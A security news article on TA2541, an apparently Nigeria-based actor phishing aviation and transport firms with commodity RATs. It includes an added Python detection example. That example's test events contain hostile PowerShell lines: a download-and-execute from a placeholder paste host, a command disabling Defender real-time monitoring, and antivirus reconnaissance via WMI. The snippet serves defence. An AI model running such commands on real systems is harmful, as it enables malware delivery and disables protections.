Unskilled hacker linked to years of attacks on aviation, transport sectors

For several years, a low-skilled attacker has been using off-the-shelf malware in malicious campaigns aimed at organizations in the aviation sector as well as in other sensitive industries.

The threat actor has been active since at least 2017, targeting entities in the aviation, aerospace, transportation, manufacturing, and defense industries.

Tracked as TA2541 by cybersecurity company Proofpoint, the adversary is believed to operate from Nigeria, and its activity has been documented before in research on separate campaigns.

Unsophisticated attacks

In a report today, Proofpoint notes that TA2541 has been consistent in its attack strategy, relying on malicious Microsoft Word documents to deliver a remote access trojan (RAT).

A typical malware campaign from this group involves sending “hundreds to thousands” of emails – usually in English – to “hundreds of organizations globally, with recurring targets in North America, Europe, and the Middle East.”

Recently, though, the group switched from malicious attachments to linking to a payload hosted in cloud services such as Google Drive, Proofpoint researchers say.

TA2541 does not use custom malware but commodity malicious tools available for purchase on cybercriminal forums. According to the researchers’ observations, AsyncRAT, NetWire, WSH RAT, and Parallax appear to be the group’s top favorites, being pushed most frequently in malicious messages.

Proofpoint highlights that all malware used in TA2541 campaigns can be used to collect data, but the threat actor’s ultimate goal remains unknown at the moment.

A typical TA2541 attack chain starts with sending an email that is usually related to transportation (e.g. flight, aircraft, fuel, yacht, charter, cargo) and delivers a malicious document.

“In recent campaigns, Proofpoint observed this group using Google Drive URLs in emails that lead to an obfuscated Visual Basic Script (VBS) file. If executed, PowerShell pulls an executable from a text file hosted on various platforms such as Pastetext, Sharetext, and GitHub” – Proofpoint

In the next stage, the adversary executes PowerShell into various Windows processes and looks for installed security products by querying the Windows Management Instrumentation (WMI).

Then it attempts to disable the built-in defenses and starts collecting system information before downloading the RAT payload onto the compromised host.
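As an added defensive illustration (not code from Proofpoint’s or Talos’s reports), the Python below runs simple per-stage detections over constructed process-creation events shaped like the chain just described and flags hosts where several stages co-occur. The event fields, the paste-site names, the WMI class `AntiVirusProduct` and the `Set-MpPreference` indicator are my assumptions about what such telemetry would show, not indicators published on this page.

```python
import re
from collections import defaultdict

# Constructed Sysmon-style process-creation events modelled on the chain
# above (script host -> PowerShell -> text-host download -> WMI AV recon
# -> defense tampering). Not real telemetry; hosts and URLs are made up.
EVENTS = [
    {"host": "ws01", "parent": "outlook.exe", "image": "chrome.exe",
     "cmd": "chrome.exe https://drive.google.com/uc?id=PLACEHOLDER"},
    {"host": "ws01", "parent": "wscript.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -w hidden IEX((New-Object Net.WebClient)"
            ".DownloadString('https://pastetext.example/raw/abc'))"},
    {"host": "ws01", "parent": "powershell.exe", "image": "powershell.exe",
     "cmd": "powershell.exe Get-WmiObject -Namespace root\\SecurityCenter2 "
            "-Class AntiVirusProduct"},
    {"host": "ws01", "parent": "powershell.exe", "image": "powershell.exe",
     "cmd": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true"},
    {"host": "ws02", "parent": "explorer.exe", "image": "powershell.exe",
     "cmd": "powershell.exe Get-WmiObject Win32_OperatingSystem"},  # benign admin use
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}          # VBS launchers
TEXT_HOSTS = re.compile(r"pastetext|sharetext|github", re.I)  # assumed names
DOWNLOAD = re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\bIEX\b", re.I)
AV_QUERY = re.compile(r"AntiVirusProduct", re.I)       # root\SecurityCenter2 class
DISABLE_AV = re.compile(r"Set-MpPreference.*-Disable", re.I)

def classify(event):
    """Return the chain stages a single event matches (possibly none)."""
    stages = []
    is_ps = event["image"].lower() == "powershell.exe"
    cmd = event["cmd"]
    if is_ps and event["parent"].lower() in SCRIPT_HOSTS:
        stages.append("vbs_to_powershell")
    if is_ps and TEXT_HOSTS.search(cmd) and DOWNLOAD.search(cmd):
        stages.append("payload_from_text_host")
    if is_ps and AV_QUERY.search(cmd):
        stages.append("wmi_security_product_recon")
    if is_ps and DISABLE_AV.search(cmd):
        stages.append("defense_disable")
    return stages

def chains_by_host(events):
    """Group matched stages per host; only hosts with two or more stages
    are returned, which keeps a lone WMI query from paging anyone."""
    seen = defaultdict(set)
    for ev in events:
        seen[ev["host"]].update(classify(ev))
    return {h: sorted(s) for h, s in seen.items() if len(s) >= 2}
```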

Given TA2541’s choice of targets, its activity has not gone unnoticed, and security researchers from other companies have analyzed its campaigns [1, 2, 3] in the past, but without connecting all the dots.

Cisco Talos published a report last year about a TA2541 campaign targeting the aviation sector with AsyncRAT. The researchers concluded that the actor had been active for at least five years.

Based on evidence from examining the infrastructure used in the attack, Cisco Talos was able to build a profile of the threat actor, linking its geographic location to Nigeria.

“While looking into the actor’s activity, using passive DNS telemetry, we compiled the list of IPs used by the domain akconsult.linkpc.net. The chart below shows that approximately 73 percent of the IPs were based in Nigeria, further strengthening the theory that the actor in question is based in Nigeria.” – Cisco Talos

In a single campaign, the actor can send up to several thousand emails to dozens of companies, and the messages are not tailored to people with specific roles. This shows that TA2541 is not concerned with the stealth of its actions, further supporting the theory of a non-proficient actor.

Although hundreds of businesses have been targeted in these “spray-and-pray” attacks, organizations across the world in the aviation, aerospace, transportation, manufacturing, and defense industries appear to be a consistent target.

Even if TA2541’s tactics, techniques, and procedures (TTPs) describe an adversary that is not technically advanced, the actor managed to run malicious campaigns for more than five years without raising too many flags.